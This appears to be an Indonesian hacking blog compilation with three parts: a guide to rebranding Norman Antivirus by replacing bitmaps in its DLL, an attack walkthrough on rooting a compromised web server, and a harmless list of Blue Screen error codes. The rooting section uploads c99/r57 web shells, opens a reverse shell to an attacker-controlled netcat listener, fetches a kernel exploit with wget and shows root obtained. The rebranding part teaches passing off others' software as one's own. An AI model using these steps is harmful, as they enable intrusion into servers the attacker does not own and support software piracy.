Hijacking

Hijack…apaan tuh? Umh…sebenarnya banyak artinya, bukan hanya diartikan sebagai pembajakan tapi pembajakan banget…belum ngerti jugak… gini NIH…kalo bajak software kan hanya membajak softwarenya aja…tinggal minjem CD orang yang berisi master software tersebut, kemudian mengcopy dan menginstall di komputer kita. Kalau Hijacking belum sampai disitu ajah… kita dapat mengganti splash screen, nama antivirus itu dan nama copyright atau pembuat atau vendor dari antivirus tersebut. CARANYA MAS…CARANYA… owkay…simak aja cerita di bawah ini
Kali ini kita akan meng-hijack antivirus luar yak .. kali ini contohnya Norman Antivirus. Sebelumnya yang harus dipersiapkan adalah:
1. PE Explorer, donlot aja di internet, banyak kok, PE explorer ini adalah sebuah tools yang digunakan untuk mereverse engineering sebuah software, yaitu membongkar isi sebuah software. Bukan hanya membongkar tapi dapat mengganti atau mengedit gambar, tulisan atau label yang ada di software tersebut
2. Process Explorer untuk melihat program ini memakai file dependensi (.dll) apa agar kita dapat menghijack softwarenya
3.  Master Norman Anti Virus (boleh bajakan, boleh yang asli)
4. Cemilan, winamp, rokok n aer putih … ya buat iseng – iseng ajah …
Okay sekarang kita mulai peng-hijack-an inih…
1. Install Software Norman Antivirus, tau kan cara nginstall-nya, gak usah dijelasin toh.
2. Kemudian Restart Komputer Anda agar lebih keren (apa coba…)
3. Nah setelah restart jalankan process explorer
4. Kemudian jalankan salah satu program dari Norman AV tersebut, misalnya Configuration Editor, Task Editor atau Utilities.
5. Lalu Jalankan process explorer untuk melihat dll apa saja yang dipakai si Norman Antivirus ini untuk menjalankan programnya. Alasannya kenapa file dll yang harus dilihat? Karena dll tersebut adalah sebuah file yang berisi komponen-komponen seperti gambar, icon, tulisan, form dan lain – lain yang digunakan oleh Norman AV untuk menjalankan programnya. Okay let’s check the process explorer
6. Disini kita bisa melihat beberapa aplikasi yang kita jalankan dari Norman AV yaitu : Nvccf.exe, Nvcte.exe dan Nvcut.exe
7. Untuk melihat dll nya klik salah satu program yang disebutkan diatas tadi, misalnya Nvccf.exe:
8. Kemudian lihat kotak bagian bawah untuk meneliti file dll apa aja yang dipakai oleh proses Nvcff.exe, kliatan kan…kemudian coba catat:
Ada Nvccf0q.dll, Nvccf0p.dll, Nvccf0o.dll, dan lain – lain…banyak kan
9. Kemudian klik proses lainnya yaitu Nvcte.exe dan Nvcut.exe untuk mengetahui dll yang dipakai, kemudian catat.
10. Dari 3 program tersebut kita dapat melihat dll yang sama dan dipakai oleh ketiga program tersebut adalah user32.dll, shell32.dll, ole32.dll, oleaut32.dll, Noemrc.dll, Niphk.dll
11. Mari kita lakukan penelitian lagi untuk melihat dll apa saja yang akan kita hijack
12. Kita mulai dari user32.dll…umh kayaknya bukan deh … soalnya user32.dll itu file dll yang digunakan windows, okay … lewat, shell32.dll juga, ole32.dll, oleaut32.dll juga merupakan komponen dll dari windows…lewat semua, yang tersisa sekarang Noemrc.dll dan Niphk.dll.
13. Sekarang kita buka PE Explorer, kemudian cari file Niphk.dll berada, yaitu di %direktori dimana Norman ter-install%\Nvc\bin\
14. Kemudian kemudian tekan tombol Ctrl+R untuk melihat resource-nya
15. Di kotak sebelah kiri anda dapat melihat hanya ada komponen version aja… umh…kayaknya bukan deh…oke lanjut ke dll selanjutnya yaitu Noemrc.dll
16. Buka file Noemrc.dll tersebut memakai PE Explorer, kemudian tekan Ctrl+R seperti tadi, kemudian lihat kotak sebelah kiri
17. Ada beberapa komponen yaitu, bitmap, Icon Entry, String dan Group Icon.
18. Klik yang ada di Bitmap
19. Umh… ada 3 sub komponen gambar, mari kita lihat…BINGGO!!!ketemu…ketiga gambar tersebut adalah bitmap yang dipakai untuk menjalankan aplikasi Norman AV, ketiga gambar yang dimuat adalah :
20. Anda bisa lihat gambar di atas ini adalah yang dipakai oleh aplikasi norman. Coba aja lihat di aplikasi Norman AV yang ada:
21. Nah sekarang untuk menghijack Norman AV ini cukup buat gambar 3 buah, harus berekstensi jpg semua.
22. Kemudian buka file Noemrc.dll dan tekan Ctrl+R
23. Kemudian Klik salah satu komponen dari sub bitmap yang mempunyai caption 101, ganti gambarnya dengan gambar atau logo yang anda buat yaitu dengan menekan tombol Shift+Ctrl+E
24. Kemudian tekan Ctrl+O untuk mencari gambar baru yang digunakan untuk mengganti logo Norman AV.
25. Lakukan langkah seperti di atas untuk sub bitmap 102 dan 103.
26. Setelah itu simpan Noemrc.dll di direktori dimana Norman AV terinstall, misalnya Norman Av terinstall di C:\Norman, maka simpan Noemrc.dll yang baru di direktori C:\Norman\Bin\ dan di C:\Norman\Nvc\Bin\
27. Setelah itu jalankan Norman AV lagi.
28. Lihat perbedaan yang terjadi, seperti gambar di bawah:
29. Jelas bukan logo, gambar yang berdiri di samping kanan diganti sama gambar kita
30. Untuk lebih jelas anda bisa me-restart komputer dan melihat splash screen yang ada …
Nah itulah sekelumit tentang hijacking program atau software. Jadi untuk membajak jangan tanggung – tanggung, sekalian aja diganti semuanya…enak kan… mengakui software yang bukan buatan kita dengan mengatasnamakan program buatan sendiri sungguh mengasyikan bukan (KALAU TIDAK TAU MALU) … yah mo gimana,…sama seperti beberapa program freeware yang anda dibuat…sakitt banget kan kalau program tersebut diakui sebagai program buatan orang lain…bukan program buatan kita…SUDAH FREEWARE DI BAJAK PULA…HAHAHAHAHAHHA…yah…moga2 ilmu ini bermanfaat… okeh, terakhir semoga kita BUKAN termasuk orang – orang seperti ini, Bukan PEMBAJAK lagi namanya tapi PEMBAJAK BANGET…. Mau gitu??

cara ngr00t

Salam hangat untuk semuanya, banyak yang request bagaimana cara ngeroot target.
Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:

1. Sediakan server / pc untuk menjalankan Netcat
2. Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode  (OFF)
3. Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
4. Sediakan Netcat (NC) untuk menerima connection dari backconnect
5. Sediakan local root exploit yang sesuai dengan kernel target

Oke, kita mulai beraksi
Asumsikan bahwa:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT ANDA: 10000
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 10000

binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …

Langkah kedua cara ngeroot:
Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:

perl backconnect.txt 100.100.100.100 10000

Langkah ketiga cara ngeroot:
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.
Contoh:

binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)

Langkah ke-empat cara ngeroot:
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.
Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya
Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Buzz, selamat anda sudah mendapatkan root.
Klo sudah dapat, dibagi bagi ya.

Blue Screen Error Message

Pesan kesalahan / eror messages biasa berisi suatu kesalahan pada operating system atau hardware.
Troubleshooting berisikan anjuran atau saran-saran apa yang harus dilakukan untuk memperbaiki kesalahan. Letaknya berada di bawah pesan error.
Kode-kode hexadesimal yang menuliskan kode-kode crash.
Memory Dump Message: mengindikasikan bahwa semua proses yang saat itu sedang berlangsung di memory disalin ke dalam sebuah file di harddisk untuk kepentingan debugging. Biasanya file debugging ini dibutuhkan para teknisi untuk menganalisa dan memperbaiki kesalahan.
Pada pembahasan kali ini kita hanya akan membahas arti pesan-pesan error utama yang terdapat dalam Blue Screen.
Code:
1. IRQL_NOT_LESS_OR_EQUAL (0X0000000A)
Ini merupakan kesalahan yang umumnya terjadi pada Blue Screen Eror, pesan ini yang paling sering muncul. Pesan kesalahan ini disebabkan umumnya kerena ada ketidakcocokan driver yang terinstall di komputer.
Daftar Penyebab:
? Masalah driver yang compatible atau tidak cocok
? Masalah Video Card, hal ini mencakup video card yang di overclock melebihi batas atau anda baru berganti Video card dan Anda belum menguninstall driver Video card lama dari chipset berbeda
? Masalah Audio Card, meliputi kesalahan konfigurasi atau bug dalam driver sound card
2. NTFS_FILE_SYSTEM atau FAT_FILE_SYSTEM (0X00000024) atau (0X00000023)
Nah, pesan ini setidaknya sudah sedikit “nyambung” memberikan gambaran di mana kerusakan berada, yaitu ada di partisi atau filesystemnya tetapi bukan di harddisknya. Kita bisa melakukan pengecekan dengan memeriksa kabel SATA atau PATA atau bisa mengecek partisi dengan tool chkdsk.
3. UNEXPECTED_KERNEL_MODE_TRAP (0X0000007F)
Bila Anda mendapatkan pesan seperti ini, dapat disebabkan karena:
? Overclock Hardware yang berlebihan
? Komponen komputer yang kepanasan
? BIOS yang korup
? Memory dan CPU yang cacat
4. DATA_BUS_ERROR
Pesan ini disebabkan karena adanya kemungkinan bahwa memory atau slot memory di motherboard rusak.
5. PAGE_FAULT_IN_NONPAGED_AREA
Disebabkan karena adanya kerusakan hardware, termasuk memory utama, memory video card, atau memory di processor (L2 Cache)
6. INACCESSIBLE_BOOT_DEVICE
Disebabkan karena adanya kesalahan dalam konfigurasi jumper harddisk yang salah, virus boot sector, driver IDE controller yang salah, atau kesalahan driver chipset.
7. VIDEO_DRIVER_INIT_FAILURE
Kesalahan terjadi pada instalasi driver video card yang kurang sempurna, restart pada saat instalasi atau juga dapat terjadi karena kesalahan dalam instalasi driver.
8. BAD_POOL_CALLER
Kesalahan ini dapat terjadi karena kesalahan atau driver yang tidak kompatibel. Sering terjadi saat melakukan instalasi XP dari upgrade, atau bukan dari instalasi baru.
9. PEN_LIST_CORRUPT
Pesan ini disebabkan karena adanya kerusakan RAM
10. MACHINE_CHECK_EXCEPTION
Disebabkan oleh cacatnya CPU, atau yang di overclock secara agresif, serta power supply yang kekurangan daya atau rusak.
Nah itu 10 pesan eror yang terjadi pada Blue Screen dan penyebabnya.
Source: xcode.or.id